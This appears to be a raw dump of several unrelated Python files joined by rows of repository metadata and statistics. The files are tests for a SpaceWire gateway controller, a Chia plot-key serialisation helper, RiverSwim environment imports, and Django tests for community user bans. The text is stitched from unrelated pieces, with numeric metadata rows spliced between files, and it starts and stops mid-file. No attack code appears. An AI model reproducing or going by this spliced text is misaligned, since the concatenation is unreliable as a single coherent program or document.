component.initialize()
assert component._inst is None
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='connect',
type=ParameterType.set,
args=['1']))
time.sleep(1)
assert dummy_test_class.func_1_times_called == 1
assert dummy_test_class.func_1_last_value.id == 'connect'
assert dummy_test_class.func_1_last_value.type == ParameterType.error
assert dummy_test_class.func_1_last_value.value == 'Instrument is unreachable'
def test_disconnection_w_no_connection(self):
dummy_test_class = CallbackTestClass()
# Subscribe to the topic that shall be published
self.context.rx['io_result'].pipe(
op.filter(
lambda value: isinstance(value, ServiceResponse))).subscribe(
dummy_test_class.test_func_1)
# Test real connection to missing instrument
component = H8823TmTcController(self.context)
component.initialize()
assert component._inst is None
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='connect',
type=ParameterType.set,
args=['0']))
time.sleep(.1)
assert component._inst is None
assert dummy_test_class.func_1_times_called == 1
assert dummy_test_class.func_1_last_value.id == 'connect'
assert dummy_test_class.func_1_last_value.type == ParameterType.set
assert dummy_test_class.func_1_last_value.value is None
def test_multi_command_multi_input_parameter(self):
# Start Mock
mock = H8823GatewayTmTcMock(
self.context,
local_config={'instrument': {
'port': {
'tc': 6300,
'tm': 6301
}
}})
mock.initialize()
dummy_test_class = CallbackTestClass()
# Subscribe to the topic that shall be published
self.context.rx['io_result'].pipe(
op.filter(lambda value: value.type != ParameterType.set and value.
type != ParameterType.error)).subscribe(
dummy_test_class.test_func_1)
self.context.rx['io_result'].pipe(
op.filter(lambda value: value.type == ParameterType.set or value.
type == ParameterType.error)).subscribe(
dummy_test_class.test_func_2)
component = H8823TmTcController(
self.context,
local_config={
'instrument': {
'port': {
'tc': 6300,
'tm': 6301
}
},
'parameters': {
'new_param': {
'description': 'New parameter description',
'set': {
'signature': [{
'status': {
'type': 'str'
}
}, {
'port': {
'type': 'int'
}
}],
'instrument_command': [{
'write':
'SPWG_TC_SPW_LINK_AUTO_{0}_{1}'
}, {
'write':
'SPWG_TC_SPW_LINK_{0}_{1}'
}]
}
}
}
})
component.initialize()
# Connect to instrument and check initial status
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='connect',
type=ParameterType.set,
args=['1']))
time.sleep(.1)
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
assert component._inst_cyclic_tm is not None
assert component._inst_cyclic_tm_thread is not None
assert dummy_test_class.func_2_times_called == 1
assert dummy_test_class.func_2_last_value.id == 'connect'
assert dummy_test_class.func_2_last_value.type == ParameterType.set
assert dummy_test_class.func_2_last_value.value is None
# Call new parameter
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='new_param',
type=ParameterType.set,
args=['ENA', '1']))
time.sleep(.1)
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
assert dummy_test_class.func_2_times_called == 2
assert dummy_test_class.func_2_last_value.id == 'new_param'
assert dummy_test_class.func_2_last_value.type == ParameterType.set
assert dummy_test_class.func_2_last_value.value is None
time.sleep(5)
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 1 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 1 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
self.context.rx['quit'].on_next(Empty())
time.sleep(1)
def test_service_invalid_info(self):
with pytest.raises(ComponentConfigException) as excinfo:
H8823TmTcController(self.context,
local_config={
'parameters': {
'new_param': {
'type': 'str',
'description':
'New parameter description',
'set': {
'signature':
'wrong',
'instrument_command': [{
'write':
'{:}'
}]
},
}
}
}).initialize()
assert '"new_param" is invalid. Format shall' \
' be [[arg_1, arg_2, ...], return_type]' in str(excinfo.value)
with pytest.raises(ComponentConfigException) as excinfo:
H8823TmTcController(self.context,
local_config={
'parameters': {
'new_param': {
'type': 'str',
'description':
'New parameter description',
'get': {
'signature': [{
'arg': {
'type': 'str'
}
}],
'instrument_command': [{
'write':
'{:}'
}]
},
}
}
}).initialize()
assert '"new_param" Signature for GET is still not allowed' in str(
excinfo.value)
with pytest.raises(ComponentConfigException) as excinfo:
H8823TmTcController(self.context,
local_config={
'parameters': {
'new_param': {
'type': 'str',
'description':
'New parameter description',
'get': {
'instrument_command': [{
'write':
'{:}'
}]
},
}
}
}).initialize()
assert '"new_param" Command for GET does not have a Query' in str(
excinfo.value)
def test_half_tm_received(self):
mock = H8823GatewayTmTcMock(self.context,
local_config={
'instrument': {
'port': {
'tc': 45678,
'tm': 45679
}
},
'half_tm': 1
})
mock.initialize()
component = H8823TmTcController(
self.context,
local_config={'instrument': {
'port': {
'tc': 45678,
'tm': 45679
}
}})
component.initialize()
# Connect to instrument and check initial status
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='connect',
type=ParameterType.set,
args=['1']))
time.sleep(1.1)
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '4 3 2 1',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
time.sleep(2)
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 1 2 3',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '4 3 2 1',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '6 7 8 9'
}
self.context.rx['quit'].on_next(Empty())
time.sleep(1)
def test_quit_observer(self):
""" Test component quit observer """
class Test:
called = False
def close(self):
self.called = True
component = H8823TmTcController(self.context)
component.initialize()
# Test quit while on load window
component._inst = Test()
assert not component._inst.called
self.context.rx['quit'].on_next(Empty())
# Test connection to the instrument has been closed
assert component._inst is None
| 41.6884 | 179 | 0.537677 | 5,401 | 49,234 | 4.522866 | 0.051842 | 0.054036 | 0.053791 | 0.035697 | 0.884313 | 0.868307 | 0.851768 | 0.830768 | 0.814434 | 0.790118 | 0 | 0.042437 | 0.365357 | 49,234 | 1,180 | 180 | 41.723729 | 0.739359 | 0.038774 | 0 | 0.797571 | 0 | 0.001012 | 0.296497 | 0.090474 | 0 | 0 | 0 | 0 | 0.137652 | 1 | 0.018219 | false | 0.001012 | 0.012146 | 0 | 0.032389 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0f4af0f00caa8cddb65ac126df2a9c935e6f7f58 | 894 | py | Python | src/plot_tools.py | ChiaCatPool/ChiaSignature | 114cce3b1e811183c85ef745e21f564b9a6e718c | [
"MIT"
] | 2 | 2021-05-27T09:36:54.000Z | 2021-10-12T08:03:08.000Z | src/plot_tools.py | Pow-Duck/ChiaSignature | 114cce3b1e811183c85ef745e21f564b9a6e718c | [
"MIT"
] | null | null | null | src/plot_tools.py | Pow-Duck/ChiaSignature | 114cce3b1e811183c85ef745e21f564b9a6e718c | [
"MIT"
] | null | null | null | from blspy import G1Element, PrivateKey
def stream_plot_info_pk(
pool_public_key: G1Element,
farmer_public_key: G1Element,
local_master_sk: PrivateKey,
):
# There are two ways to stream plot info: with a pool public key, or with a pool contract puzzle hash.
    # This one serializes the pool public key variant into bytes
data = bytes(pool_public_key) + bytes(farmer_public_key) + bytes(local_master_sk)
assert len(data) == (48 + 48 + 32)
return data
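# Usage sketch (assumption: blspy's AugSchemeMPL key derivation; exact API
# names can vary between blspy versions, so treat this as illustrative only).
if __name__ == "__main__":
    from blspy import AugSchemeMPL
    local_master_sk = AugSchemeMPL.key_gen(bytes([0] * 32))
    pool_pk = AugSchemeMPL.key_gen(bytes([1] * 32)).get_g1()
    farmer_pk = AugSchemeMPL.key_gen(bytes([2] * 32)).get_g1()
    data = stream_plot_info_pk(pool_pk, farmer_pk, local_master_sk)
    print(len(data))  # 128 bytes = 48 + 48 + 32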
| 34.384615 | 106 | 0.720358 | 137 | 894 | 4.481752 | 0.291971 | 0.175896 | 0.127036 | 0.055375 | 0.944625 | 0.944625 | 0.944625 | 0.944625 | 0.944625 | 0.944625 | 0 | 0.023977 | 0.206935 | 894 | 25 | 107 | 35.76 | 0.842031 | 0.323266 | 0 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 1 | 0.117647 | false | 0 | 0.058824 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0f56898011f165f656de0aa729f5d7e91799ec39 | 244 | py | Python | riverswim_variants/envs/__init__.py | RevanMacQueen/Riverswim-Variants | a3593c6b2960185e1815b79aba5a2ccdb6ff9ea7 | [
"MIT"
] | null | null | null | riverswim_variants/envs/__init__.py | RevanMacQueen/Riverswim-Variants | a3593c6b2960185e1815b79aba5a2ccdb6ff9ea7 | [
"MIT"
] | null | null | null | riverswim_variants/envs/__init__.py | RevanMacQueen/Riverswim-Variants | a3593c6b2960185e1815b79aba5a2ccdb6ff9ea7 | [
"MIT"
] | 1 | 2022-03-08T05:29:00.000Z | 2022-03-08T05:29:00.000Z | from riverswim_variants.envs.scaled_riverswim import ScaledRiverSwimEnv
from riverswim_variants.envs.stochastic_riverswim import StochasticRiverSwimEnv
from riverswim_variants.envs.skewed_stochastic_riverswim import SkewedStochasticRiverSwimEnv | 81.333333 | 92 | 0.930328 | 25 | 244 | 8.8 | 0.44 | 0.177273 | 0.286364 | 0.340909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045082 | 244 | 3 | 92 | 81.333333 | 0.944206 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0f59b659ef56550f26f9a02ece0c3165f39f1eb4 | 24,949 | py | Python | openbook_communities/tests/views/community/banned_users/test_views.py | TamaraAbells/okuna-api | f87d8e80d2f182c01dbce68155ded0078ee707e4 | [
"MIT"
] | 164 | 2019-07-29T17:59:06.000Z | 2022-03-19T21:36:01.000Z | openbook_communities/tests/views/community/banned_users/test_views.py | TamaraAbells/okuna-api | f87d8e80d2f182c01dbce68155ded0078ee707e4 | [
"MIT"
] | 188 | 2019-03-16T09:53:25.000Z | 2019-07-25T14:57:24.000Z | openbook_communities/tests/views/community/banned_users/test_views.py | TamaraAbells/okuna-api | f87d8e80d2f182c01dbce68155ded0078ee707e4 | [
"MIT"
] | 80 | 2019-08-03T17:49:08.000Z | 2022-02-28T16:56:33.000Z | import random
from django.urls import reverse
from faker import Faker
from rest_framework import status
from openbook_common.tests.models import OpenbookAPITestCase
import logging
import json
from openbook_common.tests.helpers import make_user, make_authentication_headers_for_user, \
make_community
logger = logging.getLogger(__name__)
fake = Faker()
class CommunityBannedUsersAPITest(OpenbookAPITestCase):
def test_cannot_retrieve_banned_users_of_private_community(self):
"""
should not be able to retrieve the banned users of a private community and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='T')
community_name = community.name
user_to_ban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_ban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_retrieve_banned_users_of_public_community(self):
"""
should not be able to retrieve the banned users of a public community and return 400
:return:
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user_to_ban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_ban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_retrieve_banned_users_of_community_member_of(self):
"""
        should not be able to retrieve the banned users of a community one is a member of and return 400
:return:
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
user_to_ban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_ban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_can_retrieve_banned_users_of_community_if_admin(self):
"""
        should be able to retrieve the banned users of a community if an admin and return 200
:return:
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_administrator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
amount_of_banned_users = 5
banned_users_ids = []
for i in range(0, amount_of_banned_users):
community_member = make_user()
other_user.ban_user_with_username_from_community_with_name(username=community_member.username,
community_name=community_name)
banned_users_ids.append(community_member.pk)
url = self._get_url(community_name=community.name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_banned_users = json.loads(response.content)
self.assertEqual(len(response_banned_users), len(banned_users_ids))
for response_banned_user in response_banned_users:
response_member_id = response_banned_user.get('id')
self.assertIn(response_member_id, banned_users_ids)
def test_can_retrieve_banned_users_of_community_if_mod(self):
"""
        should be able to retrieve the banned users of a community if a moderator and return 200
:return:
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
amount_of_banned_users = 5
banned_users_ids = []
for i in range(0, amount_of_banned_users):
community_member = make_user()
other_user.ban_user_with_username_from_community_with_name(username=community_member.username,
community_name=community_name)
banned_users_ids.append(community_member.pk)
url = self._get_url(community_name=community.name)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_banned_users = json.loads(response.content)
self.assertEqual(len(response_banned_users), len(banned_users_ids))
for response_banned_user in response_banned_users:
response_member_id = response_banned_user.get('id')
self.assertIn(response_member_id, banned_users_ids)
def _get_url(self, community_name):
return reverse('community-banned-users', kwargs={
'community_name': community_name
})
class BanCommunityUserAPITest(OpenbookAPITestCase):
def test_can_ban_user_from_community_if_mod(self):
"""
        should be able to ban a user from a community if a moderator and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_ban = make_user()
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_ban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(user_to_ban.is_banned_from_community_with_name(community.name))
def test_logs_user_banned(self):
"""
should create a log when a community user is banned
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_ban = make_user()
url = self._get_url(community_name=community.name)
self.client.post(url, {
'username': user_to_ban.username
}, **headers)
self.assertTrue(community.logs.filter(action_type='B',
source_user=user,
target_user=user_to_ban).exists())
def test_cant_ban_user_from_community_if_already_banned(self):
"""
        should not be able to ban a user from a community if they are already banned and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user, type='P')
community_name = community.name
user_to_ban = make_user()
user.ban_user_with_username_from_community_with_name(username=user_to_ban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(user_to_ban.is_banned_from_community_with_name(community.name))
def test_can_ban_user_from_community_if_admin(self):
"""
        should be able to ban a user from a community if an admin and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_administrator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_ban = make_user()
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_ban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(user_to_ban.is_banned_from_community_with_name(community.name))
def test_cant_ban_user_from_community_if_member(self):
"""
        should not be able to ban a user from a community if only a member and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
user_to_ban = make_user()
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_ban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(user_to_ban.is_banned_from_community_with_name(community.name))
def test_cant_ban_user_from_community(self):
"""
        should not be able to ban a user from a community one is not a member of and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
user_to_ban = make_user()
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_ban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(user_to_ban.is_banned_from_community_with_name(community.name))
def test_ban_user_makes_it_no_longer_a_member_of_community(self):
"""
should remove membership of a user when banned from a community
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_ban = make_user()
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_ban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(user_to_ban.is_member_of_community_with_name(community_name))
def _get_url(self, community_name):
return reverse('community-ban-user', kwargs={
'community_name': community_name
})
class UnbanCommunityUserAPITest(OpenbookAPITestCase):
def test_can_unban_user_from_community_if_mod(self):
"""
        should be able to unban a user from a community if a moderator and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_unban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_unban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_unban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(user_to_unban.is_banned_from_community_with_name(community.name))
def test_logs_user_unbanned(self):
"""
should create a log when a community user is unbanned
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_unban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_unban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
self.client.post(url, {
'username': user_to_unban.username
}, **headers)
self.assertTrue(community.logs.filter(action_type='U',
source_user=user,
target_user=user_to_unban).exists())
    def test_cant_unban_user_from_community_if_not_banned(self):
        """
        should not be able to unban a user from a community if they are not banned and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_unban = make_user()
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_unban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(user_to_unban.is_banned_from_community_with_name(community.name))
def test_can_unban_user_from_community_if_admin(self):
"""
        should be able to unban a user from a community if an admin and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_administrator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_unban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_unban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_unban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(user_to_unban.is_banned_from_community_with_name(community.name))
def test_cant_unban_user_from_community_if_member(self):
"""
        should not be able to unban a user from a community if only a member and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
user_to_unban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_unban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_unban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(user_to_unban.is_banned_from_community_with_name(community.name))
    def test_cant_unban_user_from_community(self):
        """
        should not be able to unban a user from a community one is not a member of and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user_to_unban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_unban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_unban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(user_to_unban.is_banned_from_community_with_name(community.name))
def _get_url(self, community_name):
return reverse('community-unban-user', kwargs={
'community_name': community_name
})
class SearchCommunityBannedUsersAPITests(OpenbookAPITestCase):
"""
SearchCommunityBannedUsersAPITests
"""
def test_can_search_community_banned_users_by_name(self):
"""
should be able to search for community banned users by their name and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
amount_of_community_banned_users_to_search_for = 5
for i in range(0, amount_of_community_banned_users_to_search_for):
banned_user = make_user()
banned_user.join_community_with_name(community_name=community.name)
user.ban_user_with_username_from_community_with_name(username=banned_user.username,
community_name=community.name)
banned_user_username = banned_user.profile.name
amount_of_characters_to_query = random.randint(1, len(banned_user_username))
query = banned_user_username[0:amount_of_characters_to_query]
final_query = ''
for character in query:
final_query = final_query + (character.upper() if fake.boolean() else character.lower())
url = self._get_url(community_name=community.name)
response = self.client.get(url, {
'query': final_query
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_banned_users = json.loads(response.content)
response_banned_users_count = len(response_banned_users)
if response_banned_users_count == 1:
# Our community creator was not retrieved
self.assertEqual(response_banned_users_count, 1)
retrieved_banned_user = response_banned_users[0]
self.assertEqual(retrieved_banned_user['id'], banned_user.id)
else:
# Our community creator was retrieved too
for response_banned_user in response_banned_users:
response_banned_user_id = response_banned_user['id']
self.assertTrue(
response_banned_user_id == banned_user.id or response_banned_user_id == user.id)
user.unban_user_with_username_from_community_with_name(username=banned_user.username,
community_name=community.name)
def test_can_search_community_banned_users_by_username(self):
"""
should be able to search for community banned_users by their username and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
amount_of_community_banned_users_to_search_for = 5
for i in range(0, amount_of_community_banned_users_to_search_for):
banned_user = make_user()
banned_user.join_community_with_name(community_name=community.name)
user.ban_user_with_username_from_community_with_name(username=banned_user.username,
community_name=community.name)
banned_user_username = banned_user.username
amount_of_characters_to_query = random.randint(1, len(banned_user_username))
query = banned_user_username[0:amount_of_characters_to_query]
final_query = ''
for character in query:
final_query = final_query + (character.upper() if fake.boolean() else character.lower())
url = self._get_url(community_name=community.name)
response = self.client.get(url, {
'query': final_query
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_banned_users = json.loads(response.content)
response_banned_users_count = len(response_banned_users)
if response_banned_users_count == 1:
# Our community creator was not retrieved
self.assertEqual(response_banned_users_count, 1)
retrieved_banned_user = response_banned_users[0]
self.assertEqual(retrieved_banned_user['id'], banned_user.id)
else:
# Our community creator was retrieved too
for response_banned_user in response_banned_users:
response_banned_user_id = response_banned_user['id']
self.assertTrue(
response_banned_user_id == banned_user.id or response_banned_user_id == user.id)
user.unban_user_with_username_from_community_with_name(username=banned_user.username,
community_name=community.name)
def _get_url(self, community_name):
return reverse('search-community-banned-users', kwargs={
'community_name': community_name,
})
| 40.967159 | 106 | 0.646399 | 2,896 | 24,949 | 5.167127 | 0.049378 | 0.142475 | 0.10679 | 0.11815 | 0.947808 | 0.945068 | 0.9444 | 0.932638 | 0.916132 | 0.902967 | 0 | 0.006877 | 0.283098 | 24,949 | 608 | 107 | 41.034539 | 0.829755 | 0.070103 | 0 | 0.874036 | 0 | 0 | 0.012341 | 0.002248 | 0 | 0 | 0 | 0 | 0.105398 | 1 | 0.061697 | false | 0 | 0.020566 | 0.010283 | 0.102828 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0e1a552d2ba264e6ea9d51cece9766c7dbe86c25 | 1,694 | py | Python | Zoo/neural_network_sense/nn_model.py | Tanmay-Kumar-Sinha/Evolution-Simulation | 1740c32320de7f8eab2780075f1161781eb520d1 | [
"MIT"
